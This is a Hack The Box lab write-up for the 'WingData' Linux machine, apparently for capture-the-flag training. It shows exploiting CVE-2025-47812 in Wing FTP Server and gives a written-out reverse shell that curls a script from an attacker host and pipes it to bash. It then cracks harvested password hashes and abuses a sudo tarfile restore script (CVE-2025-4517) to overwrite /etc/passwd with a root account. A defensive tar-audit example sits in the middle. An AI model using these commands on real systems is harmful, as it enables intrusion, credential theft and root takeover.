Hack The Box / LINUX / 2026-06-27
Hack The Box — WingData (Linux)
CVE-2025-47812 in Wing FTP Server v7.4.3 gives us a reverse shell as the wingftp user. User data, including salted password hashes, is stored in XML files; we crack the password of user wacky and log in via SSH. User wacky can run a Python script with sudo. The script uses the tarfile module and `tar.extractall()`; CVE-2025-4517 lets a crafted archive modify existing files, so we overwrite /etc/passwd to add a root user.
Target
- IP: 10.129.11.92
Port scan
sudo nmap -sC -sV 10.129.11.92 -p- -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_ 256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open http Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.66 (Debian)
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add wingdata.htb to /etc/hosts.
Initial enumeration
Go to http://wingdata.htb/.
There is a button labeled "client portal" that redirects to http://ftp.wingdata.htb/.
Add ftp.wingdata.htb to /etc/hosts and go to http://ftp.wingdata.htb/.
It is Wing FTP Server v7.4.3.
CVE-2025-47812 - Wing FTP Server
There is a vulnerability: CVE-2025-47812.
Here is a PoC: https://www.exploit-db.com/exploits/52347
Download the PoC
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c whoami
wingftp
Create a file named rev with the following content:
bash -i >& /dev/tcp/10.10.17.53/4444 0>&1
Start the listeners:
python3 -m http.server 5555
nc -vlnp 4444
Trigger the reverse shell:
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb -c 'curl http://10.10.17.53:5555/rev|bash'
We obtain a reverse shell.
Let's check the users of the machine:
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Nov 3 12:04 .
drwxr-xr-x 18 root root 4096 Feb 9 08:19 ..
drwxrwx--- 2 wacky wacky 4096 Jan 22 04:41 wacky
Harvesting credentials
From /opt/wftpserver, search for the user name:
grep -nriE 'wacky' .
./Data/1/users/wacky.xml:4: <UserName>wacky</UserName>
./Log/Admin/Admin-2025-11-2.log:15:[01] Sun, 02 Nov 2025 12:04:49 administrator 'admin' added a user 'wacky'. [1]
grep: ./Log/audit_db: binary file matches
In /opt/wftpserver/Data/1/users there are XML files containing user data. In wacky.xml we notice:
<Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
Listing all user names and hashes from that directory:
grep -nriE 'UserName|<Password>' .
./maria.xml:4: <UserName>maria</UserName>
./maria.xml:7: <Password>a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03</Password>
./steve.xml:4: <UserName>steve</UserName>
./steve.xml:7: <Password>5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca</Password>
./wacky.xml:4: <UserName>wacky</UserName>
./wacky.xml:7: <Password>32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca</Password>
./anonymous.xml:4: <UserName>anonymous</UserName>
./anonymous.xml:7: <Password>d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca</Password>
./john.xml:4: <UserName>john</UserName>
./john.xml:7: <Password>c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10</Password>
In /opt/wftpserver/Data/1/settings.xml we also notice:
./settings.xml:172: <SaltingString>WingFTP</SaltingString>
Put the hashes in a hash file, one line per user in the form user:hash:salt:
maria:a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
steve:5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP
john:c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP
Cracking with hashcat and SSH access
Hashcat mode 1410 is sha256($pass.$salt), which matches the salting string found in settings.xml:
./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username
./hashcat/hashcat -a 0 -m 1410 ./hash ./rockyou.txt --username --show
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP:!#7Blushing^*Bride5
anonymous:d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca:WingFTP:
Two hashes crack: wacky's password is !#7Blushing^*Bride5, and anonymous has an empty password.
ssh wacky@wingdata.htb
# Enter password !#7Blushing^*Bride5
Sudo permissions
sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py --help
usage: restore_backup_clients.py [-h] -b BACKUP -r RESTORE_DIR
Restore client configuration from a validated backup tarball.
options:
-h, --help show this help message and exit
-b BACKUP, --backup BACKUP
Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar,
where <client_id> is a positive integer, e.g., backup_1001.tar)
-r RESTORE_DIR, --restore-dir RESTORE_DIR
Staging directory name for the restore operation. Must follow the format:
restore_<client_user> (e.g., restore_john). Only alphanumeric characters and underscores
are allowed in the <client_user> part (1–24 characters).
Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_john
The script takes a .tar backup and extracts it into a staging directory.
It validates both the backup and restore-dir arguments, which prevents simple attacks through the arguments.
For the backup and staging directories it uses:
BACKUP_BASE_DIR = "/opt/backup_clients/backups"
STAGING_BASE = "/opt/backup_clients/restored_backups"
We can write to the backup folder, but not to the staging folder.
The script uses the tarfile module and tar.extractall():
    with tarfile.open(backup_path, "r") as tar:
        tar.extractall(path=staging_dir, filter="data")
The "data" filter mitigates many path traversal, symlink, and unsafe-permission issues.
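As an added defensive example (not code from the box or from restore_backup_clients.py), the following Python audits every member of a backup archive before extraction, which is the check a hardened restore script would add rather than relying on the data filter alone; the archive contents, member names and the run_demo helper are constructed for this example, and the data filter is kept on wherever the interpreter supports it.

```python
import io, tarfile, tempfile
from pathlib import Path

def member_problem(m, dest):
    """Why m must not be extracted under dest (a resolved Path), or None if safe."""
    if not (m.isreg() or m.isdir()):
        return "not a regular file or directory"  # links: nothing may be written through one
    p = Path(m.name)
    if p.is_absolute() or ".." in p.parts:
        return "absolute path or parent traversal"
    target = (dest / p).resolve()
    if target != dest and dest not in target.parents:
        return "escapes staging directory"

def audit_tar_members(tar, dest):
    dest = Path(dest).resolve()
    return [(m.name, r) for m in tar.getmembers() if (r := member_problem(m, dest))]

def safe_restore(tar_bytes, dest):
    """Audit first, extract only when nothing is rejected; keep the data filter on."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        rejected = audit_tar_members(tar, dest)
        if not rejected:
            Path(dest).mkdir(parents=True, exist_ok=True)
            extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
            tar.extractall(path=dest, **extra)
    return rejected

def build_sample_tar(hostile):
    """Constructed archive: a client config, plus (if hostile) a '..' entry and
    a symlink to /etc/passwd, the kind of members a crafted backup carries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"client_id=1001\n"
        for name in ["restore_john/client.conf"] + (["../passwd"] if hostile else []):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        if hostile:
            link = tarfile.TarInfo("restore_john/link")
            link.type, link.linkname = tarfile.SYMTYPE, "/etc/passwd"
            tar.addfile(link)
    return buf.getvalue()

def run_demo():
    hostile = safe_restore(build_sample_tar(True), tempfile.mkdtemp())
    benign_dir = tempfile.mkdtemp()
    benign = safe_restore(build_sample_tar(False), benign_dir)
    restored = (Path(benign_dir) / "restore_john" / "client.conf").is_file()
    return {"hostile_rejected": hostile, "benign_rejected": benign, "restored": restored}
```

The hostile archive is refused as a whole before any member touches disk, while the benign one is restored normally.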
Checking the Python version:
python3 --version
Python 3.12.3
Searching online we find a vulnerability in the Python tarfile module: CVE-2025-4517.
CVE-2025-4517 - Python tarfile module
PoC: https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f
With the PoC we can modify existing files, and since the script runs with sudo, the write happens as root.
The idea is to modify /etc/passwd to add a root user.
cd /opt/backup_clients/backups/
We copy /etc/passwd into this directory:
cp /etc/passwd .
We add a user r00t with password Password123:
pw=$(openssl passwd Password123); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> passwd
We modify the PoC script CVE-2025-4517.py to overwrite the original passwd file with ours. See the attached script CVE-2025-4517.py.
Copy it into /opt/backup_clients/backups/ and run it:
python3 CVE-2025-4517.py
This produces poc.tar. Rename it so that it matches the required backup_<client_id>.tar pattern:
mv poc.tar backup_1.tar
Run the vulnerable script:
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1.tar -r restore_test
[+] Backup: backup_1.tar
[+] Staging directory: /opt/backup_clients/restored_backups/restore_test
[+] Extraction completed in /opt/backup_clients/restored_backups/restore_test
Check:
cat /etc/passwd
We see:
r00t:$1$o7C749dd$CefPQKA.696u48JenDJWa1:0:0:root:/root:/bin/bash
Login as root:
su r00t
# Enter password Password123
We obtain a root shell.